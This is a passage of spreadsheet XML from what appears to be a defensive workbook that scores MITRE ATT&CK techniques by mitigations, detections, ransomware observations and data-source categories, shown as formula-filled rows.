        <f t="array" ref="AI226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD226)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ226" s="37">
        <v>222</v>
      </c>
      <c r="AK226" s="37" t="str" cm="1">
        <f t="array" ref="AK226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL226" s="37">
        <v>222</v>
      </c>
      <c r="AM226" s="37" t="str" cm="1">
        <f t="array" ref="AM226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN226" s="37">
        <v>0</v>
      </c>
      <c r="AO226" s="37">
        <v>2</v>
      </c>
      <c r="AP226" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ226" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>77.611125222222242</v>
      </c>
      <c r="AR226" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS226" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT226" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU22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3.7433869153439154</v>
      </c>
    </row>
    <row r="227" spans="1:47" ht="85">
      <c r="A227" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B227" s="37">
        <f t="shared" si="3"/>
        <v>204.1144558095238</v>
      </c>
      <c r="C227" s="37" t="s">
        <v>795</v>
      </c>
      <c r="D227" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E227" s="37" t="s">
        <v>796</v>
      </c>
      <c r="F227" s="37">
        <v>1</v>
      </c>
      <c r="G227" s="37">
        <v>1</v>
      </c>
      <c r="H227" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I227" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J227" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K227" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L227" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M227" s="37">
        <v>0</v>
      </c>
      <c r="N227" s="56">
        <v>0</v>
      </c>
      <c r="O227" s="56">
        <v>1</v>
      </c>
      <c r="P227" s="56">
        <v>0</v>
      </c>
      <c r="Q227" s="56">
        <v>0</v>
      </c>
      <c r="R227" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S227" s="57">
        <v>3</v>
      </c>
      <c r="T227" s="57" t="s">
        <v>797</v>
      </c>
      <c r="U227" s="57">
        <v>10</v>
      </c>
      <c r="V227" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12857161904761905</v>
      </c>
      <c r="W227" s="37">
        <v>13</v>
      </c>
      <c r="X227" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y227" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z227" s="37">
        <v>1</v>
      </c>
      <c r="AA227" s="37">
        <v>0.01</v>
      </c>
      <c r="AB227" s="37">
        <v>0.01</v>
      </c>
      <c r="AC227" s="37"/>
      <c r="AD227" s="50" t="s">
        <v>798</v>
      </c>
      <c r="AE227" s="37" t="str" cm="1">
        <f t="array" ref="AE227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD227)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF227" s="37">
        <v>223</v>
      </c>
      <c r="AG227" s="37" t="str" cm="1">
        <f t="array" ref="AG227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD227)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH227" s="37">
        <v>223</v>
      </c>
      <c r="AI227" s="37" t="str" cm="1">
        <f t="array" ref="AI227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD227)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ227" s="37">
        <v>223</v>
      </c>
      <c r="AK227" s="37" t="str" cm="1">
        <f t="array" ref="AK227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD227)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL227" s="37">
        <v>223</v>
      </c>
      <c r="AM227" s="37" t="str" cm="1">
        <f t="array" ref="AM227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD227)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN227" s="37">
        <v>0</v>
      </c>
      <c r="AO227" s="37">
        <v>0</v>
      </c>
      <c r="AP227" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ227" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.03815193650793</v>
      </c>
      <c r="AR227" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS227" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT227" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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28" spans="1:47" ht="34">
      <c r="A228" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B228" s="37">
        <f t="shared" si="3"/>
        <v>213.57121500000002</v>
      </c>
      <c r="C228" s="37" t="s">
        <v>799</v>
      </c>
      <c r="D228" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E228" s="37" t="s">
        <v>800</v>
      </c>
      <c r="F228" s="37">
        <v>1</v>
      </c>
      <c r="G228" s="37">
        <v>1</v>
      </c>
      <c r="H228" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I228" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J228" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K228" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L228" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M228" s="37">
        <v>0</v>
      </c>
      <c r="N228" s="56">
        <v>0</v>
      </c>
      <c r="O228" s="56">
        <v>1</v>
      </c>
      <c r="P228" s="56">
        <v>0</v>
      </c>
      <c r="Q228" s="56">
        <v>0</v>
      </c>
      <c r="R228" s="57" t="s">
        <v>801</v>
      </c>
      <c r="S228" s="57">
        <v>7</v>
      </c>
      <c r="T228" s="57" t="s">
        <v>802</v>
      </c>
      <c r="U228" s="57">
        <v>7</v>
      </c>
      <c r="V228" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13809500000000002</v>
      </c>
      <c r="W228" s="37">
        <v>14</v>
      </c>
      <c r="X228" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y228" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z228" s="37">
        <v>1</v>
      </c>
      <c r="AA228" s="37">
        <v>0.01</v>
      </c>
      <c r="AB228" s="37">
        <v>0.01</v>
      </c>
      <c r="AC228" s="37"/>
      <c r="AD228" s="50" t="s">
        <v>803</v>
      </c>
      <c r="AE228" s="37" t="str" cm="1">
        <f t="array" ref="AE228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD228)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF228" s="37">
        <v>224</v>
      </c>
      <c r="AG228" s="37" t="str" cm="1">
        <f t="array" ref="AG228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD228)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH228" s="37">
        <v>224</v>
      </c>
      <c r="AI228" s="37" t="str" cm="1">
        <f t="array" ref="AI228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD228)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ228" s="37">
        <v>224</v>
      </c>
      <c r="AK228" s="37" t="str" cm="1">
        <f t="array" ref="AK228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD228)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL228" s="37">
        <v>224</v>
      </c>
      <c r="AM228" s="37" t="str" cm="1">
        <f t="array" ref="AM228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD228)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN228" s="37">
        <v>0</v>
      </c>
      <c r="AO228" s="37">
        <v>0</v>
      </c>
      <c r="AP228" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ228" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.190405000000013</v>
      </c>
      <c r="AR228" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS228" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT228" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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29" spans="1:47" ht="34">
      <c r="A229" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B229" s="37">
        <f t="shared" si="3"/>
        <v>210.23311880952383</v>
      </c>
      <c r="C229" s="37" t="s">
        <v>804</v>
      </c>
      <c r="D229" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E229" s="37" t="s">
        <v>805</v>
      </c>
      <c r="F229" s="37">
        <v>1</v>
      </c>
      <c r="G229" s="37">
        <v>1</v>
      </c>
      <c r="H229" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I229" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J229" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K229" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L229" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M229" s="37">
        <v>0</v>
      </c>
      <c r="N229" s="56">
        <v>0</v>
      </c>
      <c r="O229" s="56">
        <v>0</v>
      </c>
      <c r="P229" s="56">
        <v>0</v>
      </c>
      <c r="Q229" s="56">
        <v>0</v>
      </c>
      <c r="R229" s="57" t="s">
        <v>801</v>
      </c>
      <c r="S229" s="57">
        <v>7</v>
      </c>
      <c r="T229" s="57" t="s">
        <v>802</v>
      </c>
      <c r="U229" s="57">
        <v>7</v>
      </c>
      <c r="V229" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W229" s="37">
        <v>14</v>
      </c>
      <c r="X229" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y229" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z229" s="37">
        <v>0</v>
      </c>
      <c r="AA229" s="37">
        <v>0</v>
      </c>
      <c r="AB229" s="37">
        <v>0</v>
      </c>
      <c r="AC229" s="37"/>
      <c r="AD229" s="50" t="s">
        <v>803</v>
      </c>
      <c r="AE229" s="37" t="str" cm="1">
        <f t="array" ref="AE229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD229)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF229" s="37">
        <v>225</v>
      </c>
      <c r="AG229" s="37" t="str" cm="1">
        <f t="array" ref="AG229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH229" s="37">
        <v>225</v>
      </c>
      <c r="AI229" s="37" t="str" cm="1">
        <f t="array" ref="AI229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD229)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ229" s="37">
        <v>225</v>
      </c>
      <c r="AK229" s="37" t="str" cm="1">
        <f t="array" ref="AK229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL229" s="37">
        <v>225</v>
      </c>
      <c r="AM229" s="37" t="str" cm="1">
        <f t="array" ref="AM229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN229" s="37">
        <v>0</v>
      </c>
      <c r="AO229" s="37">
        <v>1</v>
      </c>
      <c r="AP229" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ229" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>70.077706269841272</v>
      </c>
      <c r="AR229" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS229" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT229" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU22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1.6923263397581254</v>
      </c>
    </row>
    <row r="230" spans="1:47" ht="34">
      <c r="A230" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B230" s="37">
        <f t="shared" si="3"/>
        <v>211.16645119047621</v>
      </c>
      <c r="C230" s="37" t="s">
        <v>806</v>
      </c>
      <c r="D230" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E230" s="37" t="s">
        <v>807</v>
      </c>
      <c r="F230" s="37">
        <v>1</v>
      </c>
      <c r="G230" s="37">
        <v>1</v>
      </c>
      <c r="H230" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I230" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J230" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K230" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L230" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M230" s="37">
        <v>0</v>
      </c>
      <c r="N230" s="56">
        <v>0</v>
      </c>
      <c r="O230" s="56">
        <v>0</v>
      </c>
      <c r="P230" s="56">
        <v>0</v>
      </c>
      <c r="Q230" s="56">
        <v>0</v>
      </c>
      <c r="R230" s="57" t="s">
        <v>801</v>
      </c>
      <c r="S230" s="57">
        <v>7</v>
      </c>
      <c r="T230" s="57" t="s">
        <v>802</v>
      </c>
      <c r="U230" s="57">
        <v>7</v>
      </c>
      <c r="V230" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W230" s="37">
        <v>14</v>
      </c>
      <c r="X230" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y230" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z230" s="37">
        <v>0</v>
      </c>
      <c r="AA230" s="37">
        <v>0</v>
      </c>
      <c r="AB230" s="37">
        <v>0</v>
      </c>
      <c r="AC230" s="37"/>
      <c r="AD230" s="50" t="s">
        <v>803</v>
      </c>
      <c r="AE230" s="37" t="str" cm="1">
        <f t="array" ref="AE230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD230)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF230" s="37">
        <v>226</v>
      </c>
      <c r="AG230" s="37" t="str" cm="1">
        <f t="array" ref="AG230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD230)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH230" s="37">
        <v>226</v>
      </c>
      <c r="AI230" s="37" t="str" cm="1">
        <f t="array" ref="AI230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD230)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ230" s="37">
        <v>226</v>
      </c>
      <c r="AK230" s="37" t="str" cm="1">
        <f t="array" ref="AK230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD230)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL230" s="37">
        <v>226</v>
      </c>
      <c r="AM230" s="37" t="str" cm="1">
        <f t="array" ref="AM230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD230)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN230" s="37">
        <v>0</v>
      </c>
      <c r="AO230" s="37">
        <v>0</v>
      </c>
      <c r="AP230" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ230" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>70.38881706349207</v>
      </c>
      <c r="AR230" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS230" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT230" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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31" spans="1:47" ht="68">
      <c r="A231" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B231" s="37">
        <f t="shared" si="3"/>
        <v>155.82861471428572</v>
      </c>
      <c r="C231" s="37" t="s">
        <v>808</v>
      </c>
      <c r="D231" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E231" s="37" t="s">
        <v>809</v>
      </c>
      <c r="F231" s="37">
        <v>1</v>
      </c>
      <c r="G231" s="37">
        <v>1</v>
      </c>
      <c r="H231" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I231" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J231" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K231" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L231" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M231" s="37">
        <v>0</v>
      </c>
      <c r="N231" s="56">
        <v>0</v>
      </c>
      <c r="O231" s="56">
        <v>3</v>
      </c>
      <c r="P231" s="56">
        <v>0</v>
      </c>
      <c r="Q231" s="56">
        <v>0</v>
      </c>
      <c r="R231" s="57"/>
      <c r="S231" s="57">
        <v>0</v>
      </c>
      <c r="T231" s="57" t="s">
        <v>810</v>
      </c>
      <c r="U231" s="57">
        <v>6</v>
      </c>
      <c r="V231" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.1428619047619046E-2</v>
      </c>
      <c r="W231" s="37">
        <v>6</v>
      </c>
      <c r="X231" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y231" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z231" s="37">
        <v>3</v>
      </c>
      <c r="AA231" s="37">
        <v>0.03</v>
      </c>
      <c r="AB231" s="37">
        <v>0.03</v>
      </c>
      <c r="AC231" s="37"/>
      <c r="AD231" s="50" t="s">
        <v>794</v>
      </c>
      <c r="AE231" s="37" t="str" cm="1">
        <f t="array" ref="AE231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD231)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF231" s="37">
        <v>227</v>
      </c>
      <c r="AG231" s="37" t="str" cm="1">
        <f t="array" ref="AG231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH231" s="37">
        <v>227</v>
      </c>
      <c r="AI231" s="37" t="str" cm="1">
        <f t="array" ref="AI231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD231)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ231" s="37">
        <v>227</v>
      </c>
      <c r="AK231" s="37" t="str" cm="1">
        <f t="array" ref="AK231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL231" s="37">
        <v>227</v>
      </c>
      <c r="AM231" s="37" t="str" cm="1">
        <f t="array" ref="AM231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN231" s="37">
        <v>0</v>
      </c>
      <c r="AO231" s="37">
        <v>0</v>
      </c>
      <c r="AP231" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ231" s="37">
